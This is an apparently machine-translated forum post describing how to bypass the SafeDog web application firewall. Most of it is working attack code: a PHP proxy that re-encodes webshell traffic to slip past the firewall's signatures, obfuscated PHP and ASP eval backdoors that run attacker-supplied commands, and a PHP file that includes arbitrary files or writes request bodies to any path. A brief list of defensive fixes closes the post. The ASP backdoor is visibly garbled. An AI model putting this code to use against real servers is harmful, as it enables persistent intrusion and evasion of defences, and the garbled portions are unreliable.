Penetration Test On SafeDog]

0 × 00 breakthrough in dongle kitchen knife# Principle: BAD: caidao-> safedog-X-> backdoorGOOD: caidao-> middle-> safedog-> backdoor-> middle-> data sent by caidao kitchen knife will be intercepted by dongle, because the data sent by the kitchen knife has been included in the dongle's pattern, but if we put a script to encrypt the data between the kitchen knife and the dog, we can modify and encrypt the original data, then, a script is used to send a data stream to the dongle, which is similar to a proxy. Because there is no signature, the data stream is sent to the shell on the server, shell decrypts the encrypted data and then executes it. After execution, it returns the data to the proxy script and finally streams it back to the kitchen knife. # Code # middle. php

<?php        /*         * Author: Laterain         * Time: 20130821         * About: Middle monkey between the hacker and safedog.         * Just For Fun         */        $url = isset($_GET['shell'])?$_GET['shell']:'';        $pass= isset($_GET['pass'])?$_GET['pass']:'';        $type= isset($_GET['type'])?$_GET['type']:'php';        if ($type == 'php') {                $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));');        }        elseif ($type == 'asp') {                $shellcode = base64_encode($_POST[$pass]);        }        $shellcode = $pass.'='.urlencode($shellcode);        foreach ($_POST as $key => $value) {                if ($key == $pass) {                        continue;                }                $shellcode .= '&'.$key.'='.urlencode($value);        }        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_HEADER, 0);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        curl_setopt($ch, CURLOPT_POST, 1);        curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode);        $data = curl_exec($ch);        curl_close($ch);        print_r($data);?>

# Php backdoor

<?php$key = "hack";preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');?>

 

# Asp backdoor

<% Option explicit const BASE_64_MAP_INIT = "audio +/" dim Base64EncMap (63) dim Base64DecMap (127) dim code 'initialization function public sub initCodecs () 'initialize variable dim max, idx max = len (BASE_64_MAP_INIT) for idx = 0 to max-1 Base64EncMap (idx) = mid (BASE_64_MAP_INIT, idx + 1, 1) next for idx = 0 to max-1 Base64DecMap (ASC (Base64EncMap (idx) = idx next end sub 'base64 encryption function public function base64Encode (plain) if len (plain) = 0 then base64Encode = "" exit function end if dim ret, ndx, by3, first, second, third by3 = (len (plain) \ 3) * 3 ndx = 1 do while ndx <= by3 first = asc (mid (plain, ndx + 0, 1) second = asc (mid (plain, ndx + 1, 1) third = asc (mid (plain, ndx + 2, 1) ret = ret & Base64EncMap (first \ 4) AND 63) ret = ret & Base64EncMap (first * 16) AND 48) + (second \ 16) AND 15) ret = ret & Base64EncMap (second * 4) AND 60) + (third \ 64) AND 3) ret = ret & Base64EncMap (third AND 63) ndx = ndx + 3 loop if by3 <len (plain) then first = asc (mid (plain, ndx + 0, 1) ret = ret & Base64EncMap (first \ 4) AND 63) if (len (plain) MOD 3) = 2 then second = asc (mid (plain, ndx + 1, 1) ret = ret & Base64EncMap (first * 16) AND 48) + (second \ 16) AND 15) ret = ret & Base64EncMap (second * 4) AND 60) else ret = ret & Base64EncMap (first * 16) AND 48) ret = ret '& "=" end if ret = ret' & "=" end if base64Encode = ret end function 'base64 decryption function public function base64Decode (scrambled) if len (scrambled) = 0 then base64Decode = "" exit function end if dim realLen = len (scrambled) do while mid (scrambled, realLen, 1) = "=" realLen = realLen-1 loop dim ret, ndx, by4, first, second, third, fourth ret = "" by4 = (realLen \ 4) * 4 ndx = 1 do while ndx <= by4 first = Base64DecMap (asc (mid (scrambled, ndx + 0, 1) second = Base64DecMap (asc (mid (scrambled, ndx + 1, 1) third = Base64DecMap (asc (mid (scrambled, ndx + 2, 1) fourth = Base64DecMap (asc (mid (scrambled, ndx + 3, 1) ret = ret & chr (first * 4) AND 255) + (second \ 16) AND 3 )) ret = ret & chr (second * 16) AND 255) + (third \ 4) AND 15) ret = ret & chr (third * 64) AND 255) + (fourth AND 63) ndx = ndx + 4 loop if ndx <realLen then first = Base64DecMap (asc (mid (scrambled, ndx + 0, 1 ))) second = Base64DecMap (asc (mid (scrambled, ndx + 1, 1) ret = ret & chr (first * 4) AND 255) + (second \ 16) AND 3) if realLen MOD 4 = 3 then third = Base64DecMap (asc (mid (scrambled, ndx + 2, 1) ret = ret & chr (second * 16) AND 255) + (third \ 4) AND 15) end if base64Decode = ret end function 'initialize call initCodecs code = request ("hack ") code = base64Decode (code) eval code %>

0 × 01 breakthrough of dongle malicious code InterceptionPrinciple: php: // input is not checked. write malicious code here. After the shell is uploaded in ADS mode, you can include it. Base. php

<?phpif (isset($_GET['inc'])) {        include($_GET['inc']);        }elseif (isset($_GET['path'])) {        fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input"));}else {        echo __FILE__;}?>

# Repair suggestions:1. with Arbitrary middle encryption obfuscation and backdoor decryption, dongle officials should also be hard to solve the problem of blocking kitchen knife data, but they can start with backdoor, enhanced scanning and detection of server backdoors can effectively prevent this problem. 2. Obtain the shell through inclusion, which only enhances the signature. 3. the backdoors created by ADS cannot be found. My idea is that the server itself does not allow access to files created by ads and can only be accessed through inclusion. You can include, such as require: classified as dangerous files. Of course, we can directly find it better. 4. php: // input content filtering PS: I thought php: // input was the first one I found, but yesterday I saw the use of this in freebuf, I was attacked... So let's send it out...

Author: laterain form 90sec